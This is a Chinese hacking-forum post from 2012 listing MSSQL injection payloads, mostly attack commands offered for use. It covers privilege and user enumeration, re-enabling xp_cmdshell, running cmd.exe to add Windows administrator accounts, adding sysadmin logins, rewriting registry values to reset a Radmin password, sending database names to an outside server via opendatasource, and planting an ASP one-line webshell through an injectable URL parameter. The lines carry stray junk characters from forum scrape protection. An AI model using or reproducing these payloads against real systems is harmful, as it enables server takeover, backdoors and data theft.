找回密码
 立即注册
查看: 2475|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令* ^+ O+ `/ F( O  v) [1 l1 I+ t
//看看是什么权限的; d$ K' |: `5 x2 m5 w2 |0 m# q
and 1=(Select IS_MEMBER('db_owner'))
; s# K4 H  P5 V* R' kAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
6 x$ V% I* ~0 Y' f
4 s+ @( a& [+ \/ r0 }2 b) T+ n2 ^//检测是否有读取某数据库的权限
; Q. O8 r- Q" L0 @/ G3 p+ eand 1= (Select HAS_DBACCESS('master'))# g" @% I5 E- s
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --5 z; f( d  _" ]8 K  E/ U: @! S7 a

" O% L4 U* i( L- b) P# i4 E7 A0 r; f% }6 v% h& Z- R
数字类型
: F2 ]+ t4 |4 w$ G8 t# Band char(124)%2Buser%2Bchar(124)=0
' t' N$ N0 P8 J% \) M- b* B, z2 p: R5 G- W- i& G
字符类型
# j4 K- W/ z8 a8 c7 r7 \! D' and char(124)%2Buser%2Bchar(124)=0 and ''='1 k, X6 R1 t% P- t" D  |! d

- {* c* ^7 y$ ~+ S4 [搜索类型
( a8 s5 E+ p  Z3 a5 z# R; ^9 Q' and char(124)%2Buser%2Bchar(124)=0 and '%'='
; Y7 o  }# V; V. P$ T  \8 [. R
# g* V# ?! q  {1 f$ k9 p爆用户名) U$ j8 q3 s/ x5 `) C3 c+ D
and user>01 c4 ^  n* r4 ?2 Y' B1 B
' and user>0 and ''='
9 q$ w- }9 q  v- h: N: q! w. c$ ?: z8 Z
检测是否为SA权限
! d( q' F9 R7 W" Jand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
% h2 I, v. s0 V( r) \- @: bAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
: T! h9 V0 z: W3 L. R! ?8 s' |- [9 ?- d' C$ `/ }/ Y, `) Z: `
检测是不是MSSQL数据库, K5 b5 n" Y, C3 ?% p
and exists (select * from sysobjects);-- 4 b8 X+ ]9 L5 d; u
4 d( m9 G1 ~7 f3 q6 p1 q# s
检测是否支持多行' S: H8 {1 z* l- Z  y* Q9 V
;declare @d int;-- # O7 H- h8 M+ o' n$ U' A

; c+ o5 h6 y; S& u( b7 {' N恢复 xp_cmdshell
- q. e- L8 b5 ~+ _6 M) p;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
$ X; V8 g1 _: Z; Z5 y4 S
+ T5 F! W* z- C3 N, `
8 X5 }, z0 t7 A7 xselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
* F) H( }; Q* u$ k/ q7 H- @* K/ c: [( @( n. H
//-----------------------( ~* u7 g7 ^+ U7 w% [
//      执行命令
2 c4 W3 c) M! M0 S" L3 f5 J//-----------------------
- k" C( o5 y: {首先开启沙盘模式:
: \2 [" I1 ]* |9 ~/ Zexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
' u5 ?# a- m0 s8 `9 u4 e5 Q/ e- _# c' @. N
然后利用jet.oledb执行系统命令4 ~# L! e; D- l( r& B0 s
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'): r8 ^9 d' P+ y" u+ q
4 h! a1 n" c0 b! X% y8 v
执行命令$ I8 n# q' O4 w
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
7 g. k7 d5 p4 W# u( |" ]& b& ^& [3 B9 a, h, c1 R( [6 K+ J5 g
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
6 \! B' v# A# I% w
8 U; L& f$ N. ]4 i5 o% u1 ]4 g判断xp_cmdshell扩展存储过程是否存在:- y% l- g( U+ q7 D8 O6 x4 l; ]$ ?
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'), o& B5 W; |; A' `

3 n* }7 ?5 c1 j; g  J* C0 U写注册表
/ V8 q) D& d- c& g6 ]/ ~- s& P3 d, Dexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
2 g6 J' }9 Q& W7 X  m6 x7 h$ A& N0 Y' T, g; e% F+ y
REG_SZ
& w/ D- t; ?/ h4 ?6 O7 A2 X" i! C' p, w  c4 ^+ ?/ D/ |; j- b7 p1 v
读注册表
9 C3 {$ N$ w5 ?- i; ^4 U# X$ jexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit') @3 N: Y. [! X, z
7 \. X/ U% I4 ]3 H, i
读取目录内容4 }/ I8 G( O$ U& [
exec master..xp_dirtree 'c:\winnt\system32\',1,1" F# F/ D1 W+ W; g$ A) d/ Z
  Z2 V! s0 e" j# ~& _

; ?) S, e* ?% a/ h3 U+ {+ {数据库备份+ y3 n7 \/ o" Y6 {6 B" J# Y
backup database pubs to disk = 'c:\123.bak') u9 s- L( ^  o$ C2 N/ s
, O- q! ^( y" A9 V
//爆出长度
+ ]6 L' q! F' k) K8 }And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--# `& ^6 {, i- s- j  f" x# Z7 H
2 H) K; j( V& i2 k
0 u7 y: b+ h1 U4 [. ?# N
1 y( c* F' ?2 P5 o/ X
更改sa口令方法:用sql综合利用工具连接后,执行命令:- S* ^0 [" p! _4 U& K
exec sp_password NULL,'新密码','sa'- _2 F' T$ l* n( g5 \' O" D5 G2 W

) n7 ^; l8 J% l# }6 h# M添加和删除一个SA权限的用户test:* X, R+ @' N7 Z
exec master.dbo.sp_addlogin test,ptlove
/ V# d8 w8 t; rexec master.dbo.sp_addsrvrolemember test,sysadmin
6 }3 s6 N! D/ N; K$ l$ k. Q+ g
删除扩展存储过过程xp_cmdshell的语句:
: Z, ^; _5 U! I1 o- `exec sp_dropextendedproc 'xp_cmdshell'1 _; w; W; z6 l3 d* ~1 M* m' p

5 t9 c0 {' }: ?& J$ C9 O- ~& W3 u7 S添加扩展存储过过程" Y2 i; B3 j; w: L: B" U! y) q
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' . q9 t! Z7 j+ _# N6 s; J0 C
GRANT exec On xp_proxiedadata TO public
4 s. V# H; j, [0 }
- S' v7 u! K: T" C& z' B0 f& z  C( E8 O( B
停掉或激活某个服务。 1 f1 j4 y5 B4 K2 r3 q

! n! c  D: @  {2 \' ^exec master..xp_servicecontrol 'stop','schedule'/ Z, u1 `; s+ u" `
exec master..xp_servicecontrol 'start','schedule'( d4 A2 I% n, X/ I. b6 w

5 g  A$ r( I6 {. a* Sdbo.xp_subdirs
! `. W4 m" H/ y
2 ^* c3 V+ G8 F1 b/ l5 e3 o只列某个目录下的子目录。0 ?( S+ n4 k! Q  H
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'6 o. h- m) v4 J
3 l* d2 B% ~4 E! q5 a0 T/ j
dbo.xp_makecab
0 {' U& t5 {/ k7 I9 b  J1 S
4 L$ z8 {  l; N: U! j5 k' Q将目标多个档案压缩到某个目标档案之内。
, h9 _- u9 T) @所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
% p! i  `- {. f' ^' s: a6 i! D4 b3 O" V( u! R1 k( f' {( g1 \
dbo.xp_makecab
' Q  I& O& M8 ]# `'c:\test.cab','mszip',1,/ H& c/ p3 ?8 U2 q
'C:\Inetpub\wwwroot\SQLInject\login.asp',: ?/ P! z. l) |0 v9 Q  {* c
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
4 n- S5 ?, t' K8 G/ K/ m6 {' W- f) m$ A4 W: x
xp_terminate_process
% Y" ?& O& p. W* I3 W$ B
' P1 W( @- F/ N" I! {停掉某个执行中的程序,但赋予的参数是 Process ID。
% n0 o' o, \. k9 ]) b. y5 f利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID$ R/ b1 ]1 ]9 d. s
0 [2 K& W4 f# S  o! \8 H( T! _; t0 m
xp_terminate_process 2484
6 V# F; X- j, t7 @6 M) ?# B" t! `* g3 _' z9 k4 N( Y( j
xp_unpackcab
" L% J: E- Z! Q9 j4 `4 H/ ~- X9 V
2 ~: d2 t( T+ b' `# f解开压缩档。
; c0 S% b) t! z) M
# k: [" ~% i& J) uxp_unpackcab 'c:\test.cab','c:\temp',1
8 j( f. E1 @% C. J4 a/ W) G7 a% ~! Y1 v" `$ D
" u# z. l# B* A; @
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
: }. p2 G/ A3 Y& }% q2 {% C8 V: N) J$ s; i3 U  ]$ p
create database lcx;) x  h3 R8 _4 [, l5 ]
Create TABLE ku(name nvarchar(256) null);
4 O8 R2 h3 g/ _3 q% H7 }/ N) gCreate TABLE biao(id int NULL,name nvarchar(256) null);
! Z; c$ w; T+ l9 E
2 w$ d( \  ^- z$ t$ D8 `$ k//得到数据库名
/ l, L8 t, p9 p; J2 T" Rinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
% M! I' J9 Y( i: ~4 x0 O0 u8 P' H( ~. _) |& [1 X2 L
  [; ?) [, |; d4 L( m5 p  a
//在Master中创建表,看看权限怎样1 g- L7 N: O, P% o
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--3 g# T" P: ~* J3 t3 \
! ?  y$ L0 f7 y0 E+ c: h
用 sp_makewebtask直接在web目录里写入一句话马:
+ }  _2 P( k+ i% A& \  f/ |http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
+ G; Q% _) B5 D0 p
; n* S2 @0 h" Y' c' @//更新表内容
/ m$ ^8 M% j6 m0 r9 DUpdate films SET kind = 'Dramatic' Where id = 123" M5 y/ ?; X0 Q7 V! c
) z% u/ o  b% c% o3 H4 j
//删除内容" S8 ]! G: C6 O8 `6 g6 p6 ^+ A
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表